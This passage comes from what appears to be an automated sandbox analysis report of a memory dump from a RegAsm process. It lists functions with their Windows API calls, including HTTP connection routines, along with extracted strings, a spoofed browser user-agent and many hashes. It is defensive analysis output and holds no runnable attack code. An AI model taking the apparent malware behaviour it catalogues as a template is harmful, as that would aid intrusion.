Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireErrorHandleLastModuleRelease$ConditionVariableWake
String ID:
API String ID: 1192564941-0
Opcode ID: 4abedb88b9e4a2fe9e1f76f01a90f6b1b3ac3e37f4d0424bec38ce64c612ceba
Instruction ID: da503e9b5a87a20e2105babc717d57e8608aa471fe1d2307e044f11a65867f3d
Opcode Fuzzy Hash: 4abedb88b9e4a2fe9e1f76f01a90f6b1b3ac3e37f4d0424bec38ce64c612ceba
Instruction Fuzzy Hash: EA51D1B5D04259AFDB04EBF8D845AEFBFB5BB58300F04416AF456A3282EA345A04CB71

Function 0053EE6E Relevance: 1.7, APIs: 1, Instructions: 185COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0053F4A9

Part of subcall function 005419D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0053F492,?,?,?,?,0053F492,?,00589EB8), ref: 00541A31

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise
String ID:
API String ID: 1477838251-0
Opcode ID: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
Instruction ID: b756088b79cdc6fcb9611e60ec5426cb90f3622610dc80278f53a7cb6555a18f
Opcode Fuzzy Hash: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
Instruction Fuzzy Hash: 4C616E71D01709DBEB14CFA8E8867AABBF8FB58310F24853AD815E72A1D3749948DB50

Function 0050C6E0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 255
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734
InternetConnectA.WININET(00000000,0000EFD2,00000050,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0050C77F
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050C858

Strings

6~swr, xrefs: 0050C800

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InternetOpen$ConnectHttpRequest
String ID: 6~swr
API String ID: 3864186401-3949020348
Opcode ID: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
Instruction ID: 70100715baefbb30c352a620779e01e1d808f730c1b61b37c7f171706527f41a
Opcode Fuzzy Hash: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
Instruction Fuzzy Hash: 7FB1F6B4E00208EFEB14CFA4C895BEEBBB5FB49304F108559E505AB281D779AA05CF94

Function 005584D2 Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
Instruction ID: 262db4f49929ea17d8601a280de0a5c79875f4d3884bb4c56c2f73198716848e
Opcode Fuzzy Hash: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
Instruction Fuzzy Hash: 8CB12274A00245AFDF10CFA8C8A5BBD7FB1FF59305F24414AE805AB292CB71994ACF60

Function 00432B60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00432880: __aulldiv.LIBCMT ref: 0043293C

Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432C16

Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372

Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D01
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D32

Strings

`XA, xrefs: 00432C03, 00432CEE, 00432D1F
`@, xrefs: 00432C0C, 00432CF7, 00432D28

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
String ID: `XA$`@
API String ID: 3845869555-3161672447
Opcode ID: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
Instruction ID: f157f0d26c0302d6d38241ffe430d893d0c54141c1b3792623e3cbfa9e0c2486
Opcode Fuzzy Hash: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
Instruction Fuzzy Hash: 2051E8B0A042484BDF04DFA4D5957FEBFB1AF46300F20506AD5056B391D7B99E80CB94

Function 00432880 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0043293C

Strings

eks, xrefs: 00432973, 004329A2
j3l6lrek, xrefs: 00432A31, 00432A60
D6&, xrefs: 00432AAE

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: D6&$eks$j3l6lrek
API String ID: 3732870572-3526828890
Opcode ID: 2297a6ffd8f4ec993b45158238e90fa18b51a7cdad4546fbc05d04158f687d45
Instruction ID: c84ca28e98123b79676576f89e03ed95eb2bf0e324ecca63c0ae73cc3441d6ca
Opcode Fuzzy Hash: 2297a6ffd8f4ec993b45158238e90fa18b51a7cdad4546fbc05d04158f687d45
Instruction Fuzzy Hash: 2EA113B0D042589FDB24DFA9C990BEEBBB1BF48304F1081AAD409BB341DB746A85CF55

Function 0041A590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 0041A637

Strings

HHA, xrefs: 0041A5A6
HHA, xrefs: 0041A627, 0041A62F, 0041A62A, 0041A632

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: HHA$HHA
API String ID: 2001391462-78794114
Opcode ID: 74668efbd1ad1cf4a97c819f50880fbb537218c607c405c9a8d61c719d73c093
Instruction ID: 347e595dd39205f2bc9de3d43aec5eb327ea2cfb6b9896bcba43d2fe8e904ad1
Opcode Fuzzy Hash: 74668efbd1ad1cf4a97c819f50880fbb537218c607c405c9a8d61c719d73c093
Instruction Fuzzy Hash: BE517CB5D02209EBDF04DF94D849AEF77B5BF44304F14842AE81597381D338EAA1CB66

Function 0050CEC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36, xrefs: 0050CFF8

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
API String ID: 0-1672990099
Opcode ID: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
Instruction ID: f93c088db4f20a7e8dad6e9c5f3f14d83450d20c26dbc89e4a15c216d380c2bb
Opcode Fuzzy Hash: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
Instruction Fuzzy Hash: 8F51D3B4E00209ABDB08DFD9D895BEEBBF5BF89304F108119E915A7384D7346A41CF90

Function 00416D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00416E67

Strings

`XA, xrefs: 00416D73
WA, xrefs: 00416DEB

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID: WA$`XA
API String ID: 1443086396-855112263
Opcode ID: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
Instruction ID: e51bc9c54a42b8ef1cd12b3b9bd65c72ed8b49a9321af47167c83bb76f7294a1
Opcode Fuzzy Hash: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
Instruction Fuzzy Hash: 2241E874A04209EFDB04CF99C891BAEBBB1FF88304F108199E5456B391C775AE81CF94

Function 0050BD60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0050BDEF

Strings

-1L, xrefs: 0050BF1D
-2L, xrefs: 0050BE0C, 0050BE40

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast
String ID: -1L$-2L
API String ID: 1452528299-3975959154
Opcode ID: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
Instruction ID: 70aacba8afa5fca2be74a231ee15d976f3b6a6c99dc4215d1cbc0018f8aaf362
Opcode Fuzzy Hash: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
Instruction Fuzzy Hash: 1B510770E0020DAFDF14DFA9D896AEEBBB1FF48300F108559E505AB390DB74AA45CB94

Function 0041F8A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000001), ref: 0041F8D4
_com_issue_error.COMSUPP ref: 0041F8F2
_com_issue_error.COMSUPP ref: 0041F91B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _com_issue_error$AllocString
String ID:
API String ID: 245909816-0
Opcode ID: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
Instruction ID: 65e3a0a1e415d60e8b2d00511d3e314293ad63d9ec2b3dcbed55108a80a78f6b
Opcode Fuzzy Hash: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
Instruction Fuzzy Hash: 5F11D7B4D00208FFDB00EF94C549B9DBBB1EF44304F2081A9E8096B391D779AE89DB85

Function 0055046E Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00550468,00000000,0054BD3A,?,?,8341C89B,0054BD3A,?), ref: 0055047F
TerminateProcess.KERNEL32(00000000,?,00550468,00000000,0054BD3A,?,?,8341C89B,0054BD3A,?), ref: 00550486
ExitProcess.KERNEL32 ref: 00550498

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
Instruction ID: aa5f3a27579e3a5c9fed78bbcc659cea81a5e218e8ff5e6d7102a2a3e87ec567
Opcode Fuzzy Hash: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
Instruction Fuzzy Hash: 58D05E31000108FBCF003F64DC0D86D3F29BF80352B408011FE4947172DB728949EA90

Function 0042C9B0 Relevance: 3.2, APIs: 2, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 0042CAD5
CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 0042CC48

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CreateDirectory
String ID:
API String ID: 1884557851-0
Opcode ID: d363a749f58416d3daf0585d083070ceb7441d4ace4b4a4f5321a6a3ca3dc230
Instruction ID: afeadb30498c5ab13120cd22a2933b3bd008f1ae64185923c6379854b51f491d
Opcode Fuzzy Hash: d363a749f58416d3daf0585d083070ceb7441d4ace4b4a4f5321a6a3ca3dc230
Instruction Fuzzy Hash: B5A136B1E002189FDB14CFA9D891BEEBBB5FF88304F1480AAE509A7341DB346A45CF55

Function 0055934B Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00558A61: GetConsoleOutputCP.KERNEL32(8341C89B,00000000,00000000,00000000), ref: 00558AC4

WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00589A50,00000014,0054FE94,00000000,00000000,00000000), ref: 005594D0
GetLastError.KERNEL32(?,00000000), ref: 005594DA

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
Instruction ID: dc8fb06cd764f7ca6f03b1cbbda3dabd1d8fa8bfd74c1d61bf9c8262dcc75208
Opcode Fuzzy Hash: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
Instruction Fuzzy Hash: C0619EB180411AEFDF11CFA8C894AEEBFB9BF49305F150546EC04A7252D739D91ADBA0

Function 00413370 Relevance: 3.2, APIs: 2, Instructions: 151COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004134A2
__fread_nolock.LIBCMT ref: 004134F2

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
Instruction ID: d074c9bdc53c2ae6e50ed068fe5b00b2a9db18cb2d959dd177b800b6f206c831
Opcode Fuzzy Hash: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
Instruction Fuzzy Hash: A6617275A00109EFCB08CF98C594AEEBBB2BF88305F20819AE915A7355D735AE81DF54

Function 0054BBD1 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054BB93,?,?,?,?,?), ref: 0054BC0D
GetLastError.KERNEL32(?,?,0054BB93,?,?,?,?,?,00589670,00000018,0054BD64,?,?,?,?,?), ref: 0054BC1A

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
Instruction ID: ef7a8fef63b71a44ed52422d52d87043f3a7a095563021ebdcfa11457343129a
Opcode Fuzzy Hash: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
Instruction Fuzzy Hash: 68012632610155AFDF058F6ADC49DEE3F29FB95338B240209F841DB190EB71ED419B90

Function 0055B421 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B437
GetLastError.KERNEL32(0041C3C8,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B442

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
Instruction ID: 924246b360743d5adec2253e11b7e0ed1fd4fefad911080028757f78698ee344
Opcode Fuzzy Hash: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
Instruction Fuzzy Hash: 6FE08632101605EBDF112BA4EC0DBAD3F59BB50395F154061FA08861A1C7708958DBD0

Function 005589C1 Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,CF830579,?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A17
GetLastError.KERNEL32(?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A21

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
Instruction ID: 34048f49f0682552de953bb14b7ec8d2ae5005c56339cee503352dc134d993b2
Opcode Fuzzy Hash: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
Instruction Fuzzy Hash: 531125336052105EEA255274FC6AB7E3F5A7B82736F29070BED08AB1D1DE609C8C8192

Function 0054F0C5 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
Instruction ID: c29b62008b346feeada97876dac7d8e6a4ce1a8194132e313afe00ddb716d566
Opcode Fuzzy Hash: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
Instruction Fuzzy Hash: 7651A279A04108AFDF14CF5CCC89AE97FB1BF99318F248169E8499B252D3B19E41CB90

Function 004141F0 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00414372

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
Instruction ID: 116015eaf527f0b1982685d10685c49746b35df47215dc5781f667e9ddf383d3
Opcode Fuzzy Hash: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
Instruction Fuzzy Hash: 1151AEB4E04209DFCB04CF99D490AEEFBB1BF88310F24815AE915AB395C734A981CF94

Function 00432D40 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000), ref: 00432E1A

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionCurrentDirectoryVariableWake
String ID:
API String ID: 350265564-0
Opcode ID: d3b02b5b284cb5dd2e966d2a4cc69f6c888f9dd2ced5d1ac043a0dbc18efadac
Instruction ID: 45b6f63da3570923d1b3c5de4e04317714a7cb2b42decc6fec9e84e6155ee68e
Opcode Fuzzy Hash: d3b02b5b284cb5dd2e966d2a4cc69f6c888f9dd2ced5d1ac043a0dbc18efadac
Instruction Fuzzy Hash: 2521A074D0020DDFCF04DFA5C9859AEBBB1FF89304F14816AE80227355D735A945CBA5

Function 0042DC50 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32(00000010), ref: 0042DC60

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
Instruction ID: 645dd8e041fc49f5174826ac0665943c5158fa6918f172bb6735418e1974a661
Opcode Fuzzy Hash: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
Instruction Fuzzy Hash: 9811C9B9E40209FFEF00DFE4D846BAEBB74FB88700F104559EA14A7381D6716A00DB95

Function 0041D950 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 0041D967

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
Instruction ID: 869ab5568682ad15e99302d89ec85c8ee2891bf7aac97ea4cf070d32e3229af5
Opcode Fuzzy Hash: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
Instruction Fuzzy Hash: 03F031F0D1010CABCB04EFA8C48569EFBB5EF44344F1081AAE80597394E2349E81DB85

Function 00506C80 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 00506C9D

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
Instruction ID: 27d6b0f14bdc8df5c149e1c3db57fbdc5afaca3cbefc96f6a2f21912217cf939
Opcode Fuzzy Hash: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
Instruction Fuzzy Hash: 55F03CB0C00248EBDF10EFA5C44569DBFB4FB04314F2086AEE865662C1D6799B94CB95

Function 005013C0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 005013DD

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
Instruction ID: e4309a430077ca2301ac788c5d9ed95de07c680818ca4a53bf3ccb11ae0ffce5
Opcode Fuzzy Hash: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
Instruction Fuzzy Hash: 6CF0E7B0C04249EBCF04EFE5D4456DEBFF4BB54344F1084AED8056B291D379A694CB9A

Function 0055B45B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0041C3C8,-000A8750,?,0053EE88,0041C3C8,?,0041C3C8,00000000,?,0041A2D6), ref: 0055B48D

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
Instruction ID: 1c09f8751f9ad0378e2c381b6aa0d22663e0394ab4c576d7e2214ff403ae7fa6
Opcode Fuzzy Hash: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
Instruction Fuzzy Hash: CCE06575505216EAFE3126669C2DB6E3F4EBB817B2F150123BC4596192DB60DC0981E0

Function 00501E30 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 00501E4D

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 11c71bd430bed80597032d535f2504edd484d154af6bf423e8ce30eb3c89037f
Instruction ID: 3eb913b760bc332b54e8e0fb82937bd3ff1ebc7fdf8090ac0379c16e0dc04c0c
Opcode Fuzzy Hash: 11c71bd430bed80597032d535f2504edd484d154af6bf423e8ce30eb3c89037f
Instruction Fuzzy Hash: 93F03CB4C04209EBDF04EFA4C4456EEBFB8BB04344F1084AED80526281D3759684CB9A

Function 0051D0B0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

